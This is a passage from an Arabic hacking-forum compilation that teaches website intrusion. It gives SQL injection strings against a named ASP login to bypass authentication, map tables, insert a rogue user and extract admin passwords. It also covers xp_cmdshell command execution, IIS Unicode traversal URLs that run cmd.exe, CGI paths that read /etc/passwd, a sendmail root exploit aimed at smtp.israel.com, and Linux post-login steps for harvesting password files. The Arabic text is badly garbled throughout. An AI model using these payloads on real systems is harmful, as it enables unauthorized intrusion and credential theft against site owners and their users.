Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e14'<br />
<strong>١</strong>٦٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed<br />
quotation mark before the character string '' '.<br />
/arabic/Scripts/ar_csd_reply.asp, line 33<br />
وفي بع ض الحالا ت یظهرالخطا التالي<br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e14'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed<br />
quotation mark<br />
before the character string ''' AND Password=''.<br />
/admin/admin.asp, line 13<br />
وفي الخطأ هذا حصلنا علىجزء منأمر ال SQL وأیضاأسمأحد الأعمدهفيالجدول<br />
وهو ما یؤكدأمكانیة عمل injectلل SQL Query المستخدمهللتحقق صلاحیةأسمالمستخدم وكلمة<br />
المرورالمد خله .<br />
إذنلنتكلم عنال SQLبشيء injection منالتفصیل<br />
لوكانلدینا سكربت یقومبالتأكد من صلاحیةاسم المستخدم وكلمةالمرور المد خله من المستخدمقأننا<br />
سنتحقق منهابالطریقة التالیه<br />
code:<br />
SELECT * from Users WHERE User_Name='' AND Password=''<br />
if( TRUE ){<br />
Login OK<br />
}<br />
else {<br />
Login FAILD<br />
}<br />
<strong>١</strong>٦٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
:<br />
عندقیامأحد المسموحلهمبالدخولللصفحةالمحمیهفأنه یقوم بكلتأكید بتوثیق نفسهقبلأن یسمحله<br />
بالدخول<br />
فعندقیامه بأدخالأسمالمستخدم وكلمة المرورالخاصهبه<br />
أسم المستخدمadmin :<br />
كلمة المرورt0ps3cr3t :<br />
فإ ن شكلامر ال SQL سیصبحبالشكل التالي<br />
code:<br />
SELECT * from Users WHERE Users_Name='admin' AND<br />
Password='t0ps3cr3t'<br />
وعند وجود سطرفي جدول Userتحق قفیهالشرط وهوأن یكوناسمالمستخدم admin وكلمةالمرور<br />
t0 ps3cr3t<br />
فأن الأمر سیقومبإرجا عقیمة TRUEأيأن المستخدم مخولبالدخول<br />
غیر ذلك سیتمإرجاع FALSEوسیتم رف ضالدخول<br />
.<br />
ملاحظه :یجبأن یكونلدیك ولوالقلیل من المعرفه بأوامرال. SQL<br />
form> field>یحل from web م حلها ماأد خله المستخدمفي صفحةالتحقق من صلاحیته<br />
فيتجربتنا عندماقمنابإدخال 'كإسم مستخدم وبالمثللكلمةالمرورفأنأمرال SQLأصبحبالشكلالتالي<br />
code:<br />
:<br />
SELECT * from Users WHERE User_Name=' ' ' AND<br />
Password=' ' '<br />
ونلاحظأنناقمنابإغلاق علامة التنصی ص الأولى وبقي علامةتنصی صلمتغلق بعد<br />
وهو ماأدىلظهور رسالة الخطأ!!<br />
الأن نقوم بتجربةاٍم مستخدم1'='1' : blah' OR<br />
ومثلهالكلمة المرور.<br />
فیصبح شكلأمرالSQL<br />
code:<br />
SELECT * from Users WHERE User_Name='blah' OR '1'='1'<br />
AND Password='blah' OR '1'='1'<br />
<strong>١</strong>٦٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لن حلل الأمركلجزء على حدا<br />
SELECT * from Users<br />
تعنيأختر جمیعالسطور منالجدولUsers<br />
WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'<br />
في هذاالجزء نقوم بتحدیدالسطر الذي سنقوم بإختیاره وهوالذي تتحق قفیهالشروط<br />
'blah' OR '1'='1'<br />
هنابوجود ORلمتصبحقیمة نصیه ولكنأصبحت شرط<br />
یصبح الشرط ص حیحإ ذاكان طر ف واحد على الأقل من الأطرا فالمشتركهفيالشرط ص حیح<br />
وفي حالتنافإ نالطر ف الأول هو'blah'<br />
وهوبدونالخو ضفيتفاصیللسنافي صددهاالانیعبر عنقیمةص حیحهTRUE<br />
والطر فالأخر هو '<strong>١</strong>' ='<strong>١</strong>'<br />
یمكنكالإجابة عنإ ذاكانت <strong>١</strong> مساویهل <strong>١</strong>أم لا<br />
إ ذا سیكون شكل الشرط بعدت حلیله هوTRUE TRUE OR<br />
وبالتاليفإن النتیجهالنهائیهللشرط هيTRUE<br />
ونفسالتفاصیلتحد ثلكلمةالمرور<br />
ملاحظه مهمه جداُ:القیمه TRUE التي ن حصلها منالشرطلیست مساویهللكلمه TRUE التي نكتبها<br />
علىلوحةالمفاتیحالخاصهبنا<br />
لذلك لاتحاول إ ستخدامأسم مستخدم TRUE وكلمة مرور TRUEلإتمامالinjection SQL<br />
!!!!<br />
الشرط السابق سیقوم بأختیارأول سطر من الجدول Users ویرجع محتویاتهفي مصفوفه<br />
وبالتاليفي بع ضالحالات ستجدأنكقدأستطعت الدخولللصفحةالمحمیه<br />
ولكنفي حالاتأخرى لا<br />
لنكملالتفاصیل.....<br />
یجب التنبهلأنه ربما یكون الشرطفيأمر ال SQL وهو ما یأتي بعد WHEREیتحقق من عدةأشیاء<br />
لذلك نستخدم dashes) (two --لیتمإهمال بقیةالسطر حیثیمكننا ا لإ ستعاضه عن ماأدخلاناهقبل<br />
قلیلبالمدخلاتالتالیه<br />
،<br />
أسم مستخدم--'1'='1' : blah' OR<br />
وكذلككلمةالمرور (في بع ضالحالات یمكنكإهمال كتابةكلمة مرورلأن -- ستهملهالأنهاتأتي بعداسم<br />
المستخدمفيأمرالSQL<br />
توجد طریقه مریحه جدا ومضمونهب حیثأنكلنتحتاج لتخمینأحدأسماء الأعمده<br />
وهيأستخدامclause having<br />
بالطریقهالتالیه<br />
أسم مستخدم'1=1 --having<br />
حیث سن حصل على رسالة خطأكالتالیه<br />
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
'cs_isp_user.UserID' is invalid in the select list because it is not<br />
contained in an aggregate function and there is no GROUP BY clause.<br />
<strong>١</strong>٦٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
/Arabic/Scripts/ar_csd_reply.asp, line 33<br />
وبهاأسم الجدول وأیضاأسمأول ع مود<br />
بعدهالنستطیعال حصول علىاسماء بقیةالأعمده<br />
سنستخدمby group<br />
بالشكل التالي<br />
--group by cs_isp_user.UserID'<br />
بعدها سن حصل على عمودأسمهpasswd<br />
فنستخدمهلل حصول علىاسمالعمود اللي یلیهبالشكلالتالي<br />
--group by cs_isp_user.UserID,cs_isp_user.passwd'<br />
ونكرر زیادةأسمكل جدول مع العمودإلىأن ن حصل على صفحةتخبرنا بأنأسمالمستخدم خاطئ !<br />
نحتاج الأنأن نقومبجمعأكبرقدر ممكن منأسماءالأعمدهفي هذاالجدول<br />
نقومبإدخالالتالي:<br />
أسم مستخدم--(username) : blah' group by<br />
فن حصل علىالخطأ التالي :<br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e14'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid<br />
column name 'username'.<br />
/arabic/Scripts/ar_csd_reply.asp, line 33<br />
وهو ما یفید بأنه لا یوجد عمودفي هذاالجدوللهالأسمusername<br />
نقوم بتجربه الأسماءالشائعه مثلusername,id,userid,email, password<br />
,first_name<br />
عندتجربتنال useridفأننا ن حصل على خطأأخر وهو ما نبحث عنه<br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e14'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
<strong>١</strong>٦٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
'cs_isp_user.passwd' is invalid in the select list because it is<br />
not contained in either an aggregate function or the GROUP<br />
BY clause.<br />
/arabic/Scripts/ar_csd_reply.asp, line 33<br />
هنا حصلنا علىمعلومتین وهيأسمالجدول وهوcs_isp_user<br />
وأیضاأسمأحدالأعمده وهوpasswd<br />
نقومالان بتكرارالعملالسابق ولكن بإ ستخداماسم العمود الجدید<br />
فنقومبإدخالأسم المستخدم التالي--(passwd) : blah' group by<br />
فن حصل علىالخطأ التالي :<br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e14'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
'cs_isp_user.UserID' is invalid in the select list because it is<br />
not contained in either an aggregate function or the GROUP<br />
BY clause.<br />
/arabic/Scripts/ar_csd_reply.asp, line 33<br />
حصلنا علىأسم عمود وهو UserID وهو نفسه ماقمنا بتخمینه وهوuserid<br />
تجدرالإشارهإلىأن MSلیس SQL Server حساسلحالة الأحر ف<br />
نلاحظأننا سنكونفي حلقه غیر منتهیه ولا ن حصلإلا علىأسماء الجداول UserID وpasswd<br />
إذنالجدول لا یحويإلا على عمودین وهي التي حصلنا علیها<br />
إذنفي الحاله هذه نقوم بأدخال مستخدم جدیدللجدول وبعدها نقومبالدخولبشكل طبیعي من الصفحه<br />
الخاصه بتسجیلالدخول<br />
سنقوم بكتابة التاليفي خانةأسمالمستخدم<br />
(:<br />
blah' INSERT INTO :<br />
(:<br />
cs_isp_user(UserID,passwd<br />
) VALUES('M_3','hi')--<br />
حیث سیتمإ ضافة مستخدم جدیدلهأسم مستخدم 3_M وكلمة مرورhi<br />
وبعدهاتستطیعالدخولللصفحةالمحمیهبهذهالبیانات علىأنك مخوللهبالدخول<br />
في مثالنا (شركة الإتصالا ت)أنتهینا مناستغلالأمكانیة عمل injectلها ولكننا سنكملالحدیث عن طریقه<br />
<strong>١</strong>٦٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ممتعهلكي نستطبعقرائةاسماءالمستخدمین وكلمات مرورهم وبعدهاتستطیعالدخول بأي منها دون<br />
إ ضافة نفسك<br />
وهوالأمرالذيلن یضع شكوك حول وجودلشخ ص مشبوه<br />
سنكمل مابدأناه ولكنبإ ضافة عمودأخرلهالأسم id وهو رقمتسلسليلكل مستخدم (تذكرأنه رقم (<br />
إذنلدینا جدولأسمهuser<br />
یحويالاعمدهالتالیه<br />
idوهو رقم ص حیح<br />
نصیه (القیمالنصیه یمكنأنتحويأرقام) مثالadmin1 usernameوهوقیمة<br />
passwdوهيأیضاقیمه نصیه<br />
نجرب عمل unionلقیمه نصیه وتحویلهاإلىقیمة عددیه (لنیتم التحویل ولكنه سیخرج رساله خطأ<br />
ثمینه جدا)<br />
ندخلاسمالمستخدمuser : blah' union SELECT username FROM<br />
و سن حصل على رسالة خطأ لاتفیدنافي شيء<br />
رسالةالخطأهي<br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e14'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries<br />
in an SQL statement containing a UNION operator must have<br />
an equal number of expressions in their target lists.<br />
/admin/admin.asp, line 13<br />
نقوم بزیادة id مره واحد فتصبحبالشكل التالي<br />
blah' union SELECT username,username FROM user<br />
فن حصل على نفس رسالةالخطأ<br />
نتابعالزیادهإلىأن ن حصل على رسالة خطأ مختلفه<br />
لنفتر ضأننا حصلنا على رسالةالخطأ الجدیده عندأدخالاسم المستخدم التالي<br />
blah' union SELECT username,username,usernam<br />
e,username,username FROM user<br />
فن حصل على رسالة الخطأالتالیه<br />
<strong>١</strong>٧٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e07'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax<br />
error converting the<br />
varchar value 'Lame_Admin' to a column of data type int.<br />
/admin/admin.asp, line 13<br />
(: حصلنا علىأولأسم مستخدم وهو عادةً ما یكونللأدمن<br />
وسبب ظهور هذا الخطأ هولأننا نطلب من محرك SQLأن یقوم بتحویلقیمة نصیه (وهي<br />
إلىقیمة عددیه ص حیحه(int (<br />
وهوالشيءالغیر مسموح ،لذلك یقوم بأخباركأنه لا یستطیعتحویل Lame_Adminإلىقیمة عددیه<br />
ص حیحه :) هذاأذكى شيقامت microsoft بعمله<br />
الان حصلنا علىأسمالمستخدم وسنحاولال حصول علىكلمة المرور<br />
ندخلأسمالمستخدمالتاليpasswd,passwd,passwd,pass :blah' union SELECT<br />
(:<br />
Lame_Admin)<br />
wd,passwd FROM user<br />
بنفس العدد السابق عند حصولنا علىأسمالمستخدم<br />
سن حصل على هذا الخطأ<br />
اقتباس :<br />
Microsoft OLE DB Provider for ODBC Drivers error<br />
'80040e07'<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax<br />
error converting the<br />
varchar value 'stupid' to a column of data type int.<br />
/admin/admin.asp, line 13<br />
حصلنا علىأسم المستخدم وكلمةالمرور ویمكنناتسجیل الدخولللصفحة المحمیهبدون وجودأي أثرلنا<br />
إلاإ ذاكانتالصفحهالمحمیه عندالدخوللهاتقومبطباعة بع ضالمعلومات مثل رقمالایبيلأخر شخ ض<br />
<strong>١</strong>٧<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
قامبالد خولبإسمالمستخدم هذا<br />
عندهافكربما ستقومبهبنفسك<br />
بقيأتكلم عن ال Stored Procedure<br />
وهي كتشبیه أقربإلىأدوات موجوده مسبقا Built-inتقوم بعمل محدد عند طلبها<br />
ستستطیعا لإ ستفاده منال Storedإ Procedure ذاكانال SQL Server یعمل علىالمستخدم<br />
sa<br />
أوإ ذاكا ن المستخدم الذيیعمل علیهال SQLتمالسماحلهباٍ Server ستخدامها<br />
لذلكفأنت م حظوظ عند حصولك على SQLبهذهالأمكانیات Server<br />
یوجدأكثر من<br />
Stored Procedure <strong>١</strong>٠٠<br />
في الجدولالتاليأهمها<br />
+ ---------------------------+-----------------------------------------------------------------------<br />
-------+<br />
| xp_cmdshell----------|<br />
|---<br />
| xp_regread-----------|<br />
|-----<br />
| xp_regdeletekey----|<br />
|-----<br />
| xp_regdeletevalue-|<br />
|----<br />
| xp_regwrite ----------|<br />
|------<br />
| xp_servicecontrol--|<br />
|----<br />
+----------------------------+----------------------------------------------------------------------<br />
-------+<br />
تمریرأمرلنظامالتشغیل (یتمتنفیذه على حسب صلاحیات المستخدم )----<br />
قراءةقیمة مفتاحفي الریجستري---------------------------------------<br />
حذ ف مفتا ح من الریجستري--------------------------------------------<br />
حذ فقیمة مفتا ح من الریجستري----------------------------------------<br />
للكتابةفي الریجستري-------------------------------------------------<br />
لبدأأوأنهاء خدمة على السیرفر----------------------------------------<br />
أما<br />
طریقة ا لإ ستفاده منأي من هذهال Procedureفهيبالشكلالتالي<br />
'exec master..xp_cmdshell 'dir<br />
هذا مثاللطریقةأستخدام xp_cmdshell والبقیه مثله<br />
عداالكتابةفي الریجستريفهوبالشكلالتالي<br />
'exec master..xp_regwrite 'REGISTERY KEY' VALUE<br />
<strong>١</strong>٧٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
أیضا بقيالإشارهإلىأنه بأمكانكقراءةكود ملفا ت asp التيیعمل علیهاالموقع عن طریقإ ضافة جدول<br />
جدید ومنثم نسخكود صفحة asp ووضعه<br />
في هذاالجدولبالطریقةالتالیه<br />
((CREAT TABLE M_3 ( source varchar(8000<br />
هذا السطر یقوم ببناء الجدول وأسم الجدول 3_M وبداخله عمود واحد من النو ع varchar<br />
٨٠٠٠بایت<br />
حجمه<br />
بعد ذلك بأمكانكالانإ ضافةأي مل ف علىالسیرفرإلى هذا الجدول ومنثمقرائتهبالشكل التالي<br />
'bulk insert M_3 from 'c:\InetPub\wwwroot\login<br />
.asp<br />
ولقرائة ماتم نسخه یمكنك ذلك عن طریق رسائل الخطأالليتكلمنا عنهافي الموضو عالسابق<br />
أسهلها هو عمل union حی ثیتمتولید رسالة خطأبها ماتم نسخه....<br />
<strong>١</strong>٧٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
درس لإحتراف الهاك في اختراق المواقع<br />
"<br />
$$$$$$$$$$<br />
الكاتب CONIK:<br />
$$$$$$$$$$<br />
س:- ماهيالثغرا ت ومامعناها ؟؟<br />
ج:-الثغرات هىضع فأمنى یساعدكفى دخول نظاممعین وأختراقه وقدتكونأیضاالطریقةالمساعدة<br />
التىتخلیك تتحول من user الى administrator یعنى من مستخدم الىالمدیرالمتصر فوتتضمن<br />
ویجب علىالدواممعرفة الثغراتالامنیهالجدیدة وأستثمارها علشان لایتنبهأصحابالمواقعبیها<br />
یرقعوها (یتمتقفلیها) وأقرب مثاللهذهالثغراتالضع ف الأمنيالذ ىأكتش ففيالاباتشى وهو سیرفر<br />
یركب على نظاملیونكس وأ ىضع ففىأحد البرامجأوقاعدهبناءالموقعتعتبرثغرة ومنالممكن<br />
استخدامها والأستفاده منهافيأختراق الموقعالمرادأختراقه والتحكمفي الموقع ومشاهدة الباسوردات<br />
وكل ماترید عن طریقها<br />
س٢ : - طیبكی فانااستثمرالثغرهاذاانالقیتها ؟؟؟<br />
ج : - من وقت ماأكتشفوا الثغراتكانت منالثغراتتكون سكربتاتها مكتوبهبالغه C وانته<br />
تحتاجلمعرفة هذهاللغهأو علیكتحویلها<br />
نسبة ٩٩%<br />
.<br />
كماأن هناك العدید منالثغرات یحتاجالى shell حتىانته تتمكن منالأستفاده من هذه الثغرهأوبمعنى<br />
أخر الضع ف وعلى سبیل المثال بع ضالثغرات الموجودهفى PHPتحتاج الى Shell PHP ومن هذه<br />
الكلام.<br />
وعلىفكرةالضع ف یكونفيالاصدارات الخاصة<br />
وكمانفيثغره من نو ع Kernel x.2.2 ولكن هذهالمرةفي نظامتشغیللیونكس<br />
(ملاحظه هذهالثغراتالتىتكونباللغة Cتكون سیكربتاتتوجودهفىالموقع ( وهناكأیضا سیكربتات<br />
أخر ى مكتوبةباللغه perl ولازمفى هذه الحالةتكونانته مركبلوینكس علشانالاوامر وأناأنص حك<br />
تركب7.3 linux Redhat<br />
لأنهأفضل منالماندریك وأذكرانهالأ خبلاك هانترلمنانا سألتهأركبالماندریك ولاالریدهاتقاللىانه<br />
الماندریك صورة مبسطه<br />
للریدهاتبس غیرقابلهللتطور وأنه الریدهات أقوى وجزاةاالله خیر على هذهالنصیحة نرجعللموضو ع<br />
س ٣:-كیفأحوللغهالبیرل ؟؟<br />
ج:-الطریقة مره سهلهكلهااوامر عادیةفيالبدایة انته سو ى هذه الأمر<br />
./file.pl<br />
تعطیك هذه الرسالة<br />
Denied---- Accessهذه الرسالةتوضح عدم الموافقه<br />
أذا صارلككذاك ل ما علیك سو ى كتا بتهالامر هذه<br />
Conik.pl----- chmodلاحظ x+ مكانكونیكانتهتكتبأسم الملف<br />
<strong>١</strong>٧٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
وشغلة مرهثانیة وشو ف النتجیه راحتكون ز ىكذا<br />
$ ./Conik.pl<br />
س٤:- طیببالنسبةللغةC؟<br />
ج:- علشانتحویل المل ف لازم انتهتخلىالمل ف یكون مل فتنفیذ ىبهذهالامر<br />
------> Conik.c gccلاحظانهانتهتكتبأسم -o Conik المل فبدالأسمىكونیكالمرادتغیرة<br />
یعنى على سبیلالمثال :-<br />
gcc -o Conik conik.c<br />
وراح یكون المل ف جاهز بعد هذهالامر<br />
./Conik.c<br />
وبعد ماصارالمل ف جاهز<br />
$ gcc -o sendmail sendmail.c<br />
$ ./sendemail<br />
Usage : sendmail <br />
$ ./sendmail smtp.israel.<strong>com</strong> RedHat-7.3 anonymous anonymous -----><br />
لاحظانكانتهتكتب هنا الموقع الىتبغاه مكانisrael<br />
connecting to host...<br />
connected...<br />
id<br />
uid=0(root) gid=0(root)<br />
لاحظانه طلب ممناالملقمللبرنامج Sendemail وكمان طلب نظامالتشغیل والیوزر والباسورد<br />
وبعد هذهكله البرنامجأعطاناأمتیاز Rootبسببقیام البرنامج بتنفیذ الnofer Exan<br />
ملاحظة لاتضنأنهلمنانا حطیتالبرنامج .XXXبدون SENDMAIL ا ى سببأنا حطی تلك هذه<br />
المثال لآنه هناكثغرهفى هذه البرنامج وراحأشرحهالكأن شاءااللهتعالىبسكانبدىتحفظ الأسم هذه<br />
الظاهرانه ن حنا أتوغلنافى الموضو ع زایدة عن اللزوم<br />
س٥:- یاااللهكل هذه علشانثغرهب سبطل تأنا ماأبغا اتعلم؟<br />
ج:-لووووول حبیبالبى هذهالطریقةالمعقده شویةللثغراتفيثغراتثانیة حلوة وسهله جدا جدا<br />
س٦:-أی شهيقو ل یا Conikتر ى هذه الطریقة یبغالها نظامتشغیل وكمانلغه C وPerl؟<br />
ج:-فيتغرا تتستخدم من خلالالمتصفحیعنىانتهتشو ف معلومات الموقع عبرالمتصفحوتوصل الى<br />
مل فالباسوردات من هذهالطریقه<br />
<strong>١</strong>٧٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ومثال على هذه الثغرا تetc PHP - CGI - UNICODE - VB -<br />
س٧:-اوووووة UNICODEأنا سمعت عنهاكثیر نفسىاشو فكی ف شكلها وأعر ف وی ش هى ؟؟؟<br />
ج:- حبیبى UNICODEهى عبارة عنضع ففي نظام IISفي Microsoft مماتساعدفيأختراق<br />
الموقع بكل سهوله عموماالاختراقبهذهالطرق سه ل جدا<br />
مقارنةبالطرق السابقة التىتم ذكرها منقبل وسو فأضعأمثله علىثغرا ت-: UONICODE<br />
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%<br />
35%63../winnt/system32/cmd.exe?/c+dir+c:\<br />
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe<br />
?/c+dir+c:\<br />
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32<br />
/cmd.exe?/c+dir+c:\<br />
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste<br />
m32/cmd.exe?/c+dir+c:\<br />
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd<br />
.exe?/c+dir+c:\<br />
حاولتقد المستطا عانىأشكلفىأنوا عUONICODE<br />
أمابالنسبةالىثغرات ال CGI هذه مثال علیها<br />
/ cgi-bin/view-source?../../../../../../../etc/passwd<br />
/cgi-bin/phf<br />
/cgi-bin/wwwboard.pl<br />
/cgi-bin/AT-admin.cgi<br />
<strong>١</strong>٧٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
/cgi-bin/info2www<br />
/cgi-bin/environ.cgi<br />
هذه وباقىالعدید من الثغراتیعنى لا یقتصر الأمر على هذهالثغرات وراح أقسمالثغرا تلكب حسب نظام<br />
التشغیل<br />
NT : Uni code , bofferoverfollow , tftp<br />
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail ,<br />
ProFTPD, WU-FTPD, Kernel Exploits, rootkits,<br />
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel<br />
...exploits, rootkits, ProFTPD, WU-FTPD,<br />
<strong>١</strong>٧٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"استغلال لینكس في اختراق المواقع<br />
"<br />
$$$$$$$$$$$$$$<br />
الكاتب 2001: Viagra<br />
$$$$$$$$$$$$$$<br />
هذا الموضو ع مخص صلمنأراد التعامل معلینكسفياختراق المواقع ولیسلدیه الخبرة الكافیةفیه ...<br />
سو ف یكون هذا الموضو ع عن العملیات التيیست حسن القیامبها بعد ال حصول علىكلمة السر والنجاحفي<br />
الدخول على النظام ..<br />
أولایجب انتعر ف بأنهیمكن انتدخل على بع ض الانظمةباستخدام بع ض الكلمات المشهورة وتوجد بع ض<br />
الانظمةتسمحلك بتنفیذأمر واحدثمتقومباخراجك من النظام بعد ذلك وأفضلتلك الأوامرهي .:<br />
who<br />
rwho<br />
finger<br />
وتستفید من هذه الأوامر بأنكتستعر ضاسماء المستخدمینللنظام وبذلكیمكن انتستخرجكلمة السر من<br />
نفس الاسم وذلكلأن بع ض المستخدمینیستعملكلمة سر مشابهةتقریبالأسمه<br />
مثل .:<br />
username : Black<br />
password : Black2<br />
وفي بع ض الأنظمةتستطیع الدخول بكتابة testأو demo<br />
من الملفات المهمة والتيیجب علیكاستخراجها بعددخولك علىأي<br />
نظام .:<br />
/etc/passwd<br />
/etc/group<br />
/etc/hosts<br />
/usr/adm/sulog<br />
/usr/adm/loginlog<br />
/usr/adm/errlog<br />
/usr/adm/culog<br />
/usr/mail<br />
/usr/lib/cron/crontabs<br />
/etc/shadow<br />
ال حساب .: bin<br />
وهو مهم حی ثیحتوي على حساب المستخدم ویوجدبه معظم الملفات المهمة وقد یوجد<br />
واذاكانكذلكفیمكن<br />
أحیانا (اضافةكلمة سر خاصةبك وتضی ف حسابد خول) روت (لك !!<br />
مل فكلمة السر<br />
(<br />
والطریقةبسهولةكالتالي .:<br />
ed passwd $<br />
وأخیراتقول exec login وتكتبأياسم وبذلكتكون انت مدیر النظام !!<br />
<strong>١</strong>٧٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ما الذي سو فتواجهه عنددخولك علىأي نظام بكلمة سر واسم مستخدم؟ !!<br />
عنددخولك الى النظام ستقابلاحد ى هذه الاحتمالات .:<br />
اما انكاست طعت ال حصول على حساب مدیر النظام) الروت (أو انك حصلت على حساب<br />
في البدایةتكتب الامر التالي .:<br />
مستخدمآخر ..<br />
pwd $<br />
والنتیجةتظهر .:<br />
usr/admin/ $<br />
النتیجة اظهرت انكاستطعت الدخول على المدیر وبذلكتستطیع التعامل معكامل النظامبدونقیود ..<br />
اذاظهرتنتیجة رغی تلك النتیجة ..فمثلا :<br />
usr/Black/ $<br />
فهذا یدل على انكدخلت على حساب هذا المستخدم !!<br />
ولعر ض ملفات هذا المستخدمتكتب<br />
الآتي .:<br />
ls /usr/Black $<br />
وسو ف یعر ضلك ملفات هذا المستخدم .:<br />
mail<br />
pers<br />
games<br />
bin<br />
ولكن هذالن یعر ض مل ف .profile<br />
ولكيتستعرضهتكتب الآ<br />
تي .:<br />
cd $<br />
ls -a $<br />
:<br />
:<br />
.profile<br />
$<br />
اذا اردتقراءةمحتویات ملففسو فتكتب الأمر التالي .:<br />
cat letter $<br />
وهذا اذا افترضنا ان المل ف المطلوبهو letter<br />
اذا اردتتغییركلمة السرفما علیك<br />
passwd $<br />
الا انتكتب .:<br />
ثم سیطلب منككلمة السر القدیمة وهي طبعا معك !!وتدخلكلمة السر الجدیدة ..<br />
للب حث عن معلومة معینةتكتب الأمر التالي .:<br />
grep phone Black $<br />
وهذابافترا ض انك طلبت ارقام الهات ف الخاصةبالمستخدم الآخر<br />
ولعمل نسخ من مل ف الى<br />
cp letter letters $<br />
مل فآخرتكتب الآتي .:<br />
<strong>١</strong>٧٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اذا اردت عمل<br />
مع محادثة<br />
مستخدمآخر على اتصال فتكتب الأمر التالي .:<br />
write $<br />
ولمعرفة<br />
who $<br />
من یوجد على النظام نكتب الآتي .:<br />
safadM tty1 april 19 2:30<br />
paul tty2 april 19 2:19<br />
gopher tty3 april 19 2:31<br />
واذا اردتقراءة الملف المحتوي علىكلمات السر المظللةیجب انتكونقددخلت على النظامباستخدام<br />
حساب المدیر نفسه .. ولاستعرا ض مل فكلمات السر<br />
نكتب .:<br />
cat /etc/passwd $<br />
root:F943/sys34:0:1:0000:/:<br />
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh<br />
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh<br />
وقدیظهر<br />
حسابآخرللمدیركالتالي .:<br />
Black:chips11,43:34:3:Mr doooom:/usr/Black:<br />
